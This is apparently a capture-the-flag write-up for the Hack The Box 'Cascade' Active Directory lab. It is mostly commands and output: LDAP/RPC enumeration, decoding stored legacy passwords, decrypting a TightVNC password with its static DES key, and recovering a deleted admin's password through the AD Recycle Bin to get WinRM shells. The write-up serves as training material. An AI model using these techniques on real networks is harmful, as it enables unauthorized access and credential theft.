Cascade #5 AD

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.182

All 1000 scanned ports on 10.10.10.182 (10.10.10.182) are in ignored states.

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.182 

PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.182    

53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-26 07:47:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-12-26T07:48:31
|_  start_date: 2023-12-26T07:34:24
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Enumeration: SMB - TCP 445

SMB seems to allow anonymous login, but then shows no shares:

┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.10.182
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.182

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970

Enumeration: RPC - 445

RPC does allow for anonymous connection as well. I am able to list domain users:

┌──(kali💀kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.182

rpcclient $> enumdomusers 
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

Enumeration: LDAP - TCP 389

First, we can try an anonymous bind on the LDAP port using ldapsearch and list usernames. Here, we used the grep command to look for the userPrincipalName attribute that specifies the UPN of the users.

┌──(kali💀kali)-[~]
└─$ ldapsearch -x -b "dc=cascade,dc=local" -H ldap://10.10.10.182 | grep userPrincipalName

userPrincipalName: CascGuest@cascade.local
userPrincipalName: arksvc@cascade.local
userPrincipalName: s.smith@cascade.local
userPrincipalName: r.thompson@cascade.local
userPrincipalName: util@cascade.local
userPrincipalName: j.wakefield@cascade.local
userPrincipalName: s.hickson@cascade.local
userPrincipalName: j.goodhand@cascade.local
userPrincipalName: a.turnbull@cascade.local
userPrincipalName: e.crowe@cascade.local
userPrincipalName: b.hanson@cascade.local
userPrincipalName: d.burman@cascade.local
userPrincipalName: BackupSvc@cascade.local
userPrincipalName: j.allen@cascade.local
userPrincipalName: i.croft@cascade.local

We got some users. Now, for the CTF-y part, we had to take a closer look at ldapsearch command output and found an attribute named cascadeLegacyPwd for the r.thompson@cascade.local user.

┌──(kali💀kali)-[~]
└─$ ldapsearch -x -H ldap://10.10.10.182 -b "ou=Users,ou=UK,dc=cascade,dc=local"

┌──(kali💀kali)-[~]
└─$ ldapsearch -x -b "dc=cascade,dc=local" -H ldap://10.10.10.182 | grep -E 'userPrincipalName|cascadeLegacyPwd'

userPrincipalName: CascGuest@cascade.local
userPrincipalName: arksvc@cascade.local
userPrincipalName: s.smith@cascade.local
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=
userPrincipalName: util@cascade.local
userPrincipalName: j.wakefield@cascade.local
userPrincipalName: s.hickson@cascade.local
userPrincipalName: j.goodhand@cascade.local
userPrincipalName: a.turnbull@cascade.local
userPrincipalName: e.crowe@cascade.local
userPrincipalName: b.hanson@cascade.local
userPrincipalName: d.burman@cascade.local
userPrincipalName: BackupSvc@cascade.local
userPrincipalName: j.allen@cascade.local
userPrincipalName: i.croft@cascade.local

Using the base64 command, it was possible to decode the value and get a potential password.

┌──(kali💀kali)-[~]
└─$ echo clk0bjVldmE= | base64 -d
rY4n5eva

Then, using crackmapexec, it was possible to check if the password was valid.

┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.10.182 -d cascade.local -u r.thompson -p rY4n5eva 

SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 

I tried connecting over WinRM, but didn’t succeed.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts 

┌──(kali💀kali)-[~]
└─$ evil-winrm -i cascade.local -u r.thompson -p 'rY4n5eva'

┌──(kali💀kali)-[~]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p rY4n5eva
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
HTTP        10.10.10.182    5985   CASC-DC1         [-] cascade.local\r.thompson:rY4n5eva 

Shell as s.smith

Revisiting SMB: With the password collected from LDAP, more shares are visible:

┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.10.182 -d cascade.local -u r.thompson -p rY4n5eva --shares

SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
SMB         10.10.10.182    445    CASC-DC1         [*] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$                          
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ            
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share                                                                                            
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers                                                                                               
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share    

smbmap shows the same:

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva

[+] IP: 10.10.10.182:445        Name: cascade.local             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share 

Share Enumeration:

┌──(kali💀kali)-[~]
└─$ smbclient \\\\10.10.10.182\\Data -U r.thompson
Password for [WORKGROUP\r.thompson]:
smb: \> 

By taking a look at the Data share, we found multiple folders. In a real-world scenario, adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives. With the previously discovered shares, let’s see if we can find interesting files.

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt off
smb: \> mget *

NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as IT/Email Archives/Meeting_Notes_June_2018.html (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log (1.0 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as IT/Logs/DCs/dcdiag.log (4.7 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as IT/Temp/s.smith/VNC Install.reg (2.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)

Done. Let’s start by taking a look at the Meeting_Notes_June_2018.html file. I’ll keep an eye out for the admin account password and TempAdmin.

VNC Install.reg is interesting too. The file uses 16-bit characters, and therefore looks really ugly in less or vim, but cat handles it: The line "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f jumped out as interesting.

Crack TightVNC Password:

OPTION1:

GitHub - jeroennijhof/vncpwd: VNC Password DecrypterGitHub

Some reading about TightVNC shows that it stores the password in the register encrypted with a static key. There’s a bunch of tools out there to do it. I used this. That command is using the -r -p options in xxd to convert from a hex string to ran binary.

┌──(kali💀kali)-[~/Desktop/vncpwd]
└─$ echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass

┌──(kali💀kali)-[~/Desktop/vncpwd]
└─$ ./vncpwd vnc_enc_pass
Password: sT333ve2

OPTION2:

GitHub - frizb/PasswordDecrypts: Handy Stored Password Decryption TechniquesGitHub

This is interesting, it’s a backup of registry keys related to VNC. We can also see an encoded password. VNC uses a hardcoded DES key to store credentials. The same key is used across multiple product lines so we may get a cleartext password by decrypting it.

Using this post about VNC passwords, we can try to decrypt it. According to the article, decryption the password is as simple as that:

┌──(kali💀kali)-[~/Desktop]
└─$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008

WinRM:

With these creds, crackmapexec shows that it is possible to get a shell over WinRM:

┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
HTTP        10.10.10.182    5985   CASC-DC1         [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)

┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
39a92c------------------------------

Privesc: s.smith –> arksvc

Enumeration:

*Evil-WinRM* PS C:\Users\s.smith\Desktop> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 7:58:05 PM
Password expires             Never
Password changeable          1/28/2020 7:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 MapAuditDrive.vbs
User profile
Home directory
Last logon                   1/28/2020 11:26:39 PM

Logon hours allowed          All

Local Group Memberships      *Audit Share          *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

*Evil-WinRM* PS C:\Users\s.smith\Desktop> systeminfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1

*Evil-WinRM* PS C:\Users\s.smith\Desktop> net localgroup "Audit Share"
Alias name     Audit Share
Comment        \\Casc-DC1\Audit$
Members
-------------------------------------------------------------------------------
s.smith
The command completed successfully.

s.smith is the only user in the group, but the comment is a useful hint to look at this share. There’s a c:\shares, but I don’t have permissions to list the directories in it:

*Evil-WinRM* PS C:\Shares> dir
Access to the path 'C:\Shares' is denied.

However, I can just go into Audit based on the share name in the comment:

*Evil-WinRM* PS C:\Shares> cd Audit
*Evil-WinRM* PS C:\Shares\Audit> dir

    Directory: C:\Shares\Audit
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/28/2020   9:40 PM                DB
d-----        1/26/2020  10:25 PM                x64
d-----        1/26/2020  10:25 PM                x86
-a----        1/28/2020   9:46 PM          13312 CascAudit.exe
-a----        1/29/2020   6:00 PM          12288 CascCrypto.dll
-a----        1/28/2020  11:29 PM             45 RunAudit.bat
-a----       10/27/2019   6:38 AM         363520 System.Data.SQLite.dll
-a----       10/27/2019   6:38 AM         186880 System.Data.SQLite.EF6.dll

I can also access this share from my local box:

┌──(kali💀kali)-[~]
└─$ crackmapexec smb -u s.smith -p sT333ve2 --shares 10.10.10.182

I’ll copy all the files to my local VM:

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient --user s.smith //10.10.10.182/Audit$ sT333ve2

smb: \> mask ""
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *

Audit.db:

The first thing I looked at was DB\Audit.db. It’s a SQLite3 database:

┌──(kali💀kali)-[~/Desktop/DB]
└─$ file Audit.db 

Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60

I dumped all the data from the three tables:

┌──(kali💀kali)-[~/Desktop/DB]
└─$ sqlite3 Audit.db 
SQLite version 3.44.0 2023-11-01 11:23:50

sqlite> .tables
DeletedUserAudit  Ldap              Misc 

sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local

sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local

sqlite> select * from Misc;

Nothing jumped out as particularly interesting. I thought the Ldap table could have had a password in it, but the base64-encoded data didn’t decode to ASCII. Perhaps it’s encrypted somehow.

CascAudit.exe:

RunAudit.bat shows that CascAudit.exe is run with the db file as an argument:

┌──(kali💀kali)-[~/Desktop]
└─$ cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"    

It’s a .NET binary:

┌──(kali💀kali)-[~/Desktop]
└─$ file CascAudit.exe 
CascAudit.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

I’ll jump over to a Windows VM and use DNSpy to take a look. In the MailModule, there’s this code:

It is opening an SQLite connection to the database passed as an arg, reading from the LDAP table, and decrypting the password.

I decided to recover the plaintext password by debugging. I put a breakpoint on line 53 where the SQL connection is closed. Then I went Debug -> Start Debugging…, and set the Arugument to where I had a copy of Audit.db:

On hitting OK, it runs to the breakpoint, and I can see the decrypted password in the Locals window:

Based on the line in the SQLite DB, this password, w3lc0meFr31nd, likely pairs with the account arksvc.

WinRM:

crackmapexec shows that not only does the password work, but will provide a WinRM shell:

┌──(kali💀kali)-[~]
└─$ crackmapexec winrm 10.10.10.182 -u arksvc -p w3lc0meFr31nd

SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
HTTP        10.10.10.182    5985   CASC-DC1         [+] cascade.local\arksvc:w3lc0meFr31nd (Pwn3d!)

Had I not know the account that was associated with this password, I could have used crackmapexec with a list of users:

┌──(kali💀kali)-[~]
└─$ crackmapexec winrm 10.10.10.182 -u users -p w3lc0meFr31nd --continue-on-success

Anyway, I can get a shell over Evil-WinRM as arksvc:

┌──(kali💀kali)-[~]
└─$ evil-winrm -u arksvc -p "w3lc0meFr31nd" -i 10.10.10.182

*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc

Privesc: arksvc –> administrator

Enumeration:

arksvc is also in some interesting groups:

*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name                    arksvc
Full Name                    ArkSvc
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/9/2020 4:18:20 PM
Password expires             Never
Password changeable          1/9/2020 4:18:20 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/29/2020 9:05:40 PM

Logon hours allowed          All

Local Group Memberships      *AD Recycle Bin       *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

AD Recycle:

AD Recycle Bin is a well-know Windows group. Active Directory Object Recovery (or Recycle Bin) is a feature added in Server 2008 to allow administrators to recover deleted items just like the recycle bin does for files. The linked article gives a PowerShell command to query all of the deleted objects within a domain:

Active Directory Object Recovery Using the Recycle Binblog.stealthbits.com

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

Deleted           : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name              : TempAdmin
                    DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass       : user
ObjectGUID        : f0cc344d-31e0-4866-bceb-a842791ca059

The last one is really interesting, because it’s the temporary administer account mentioned in the old email I found earlier (which also said it was using the same password as the normal admin account). I can get all the details for that account:

*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *

cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz

Immediately cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz jumps out. It decodes to baCT3r1aN00dles:

┌──(kali💀kali)-[~/Desktop]
└─$ echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles  

WinRM:

This password works for the main administrator account:

┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.182 -u administrator -p baCT3r1aN00dles
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
HTTP        10.10.10.182    5985   CASC-DC1         [+] cascade.local\administrator:baCT3r1aN00dles (Pwn3d!)

I can get a WinRM session as administrator:

┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -u administrator -p baCT3r1aN00dles -i 10.10.10.182

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a649---------------------------------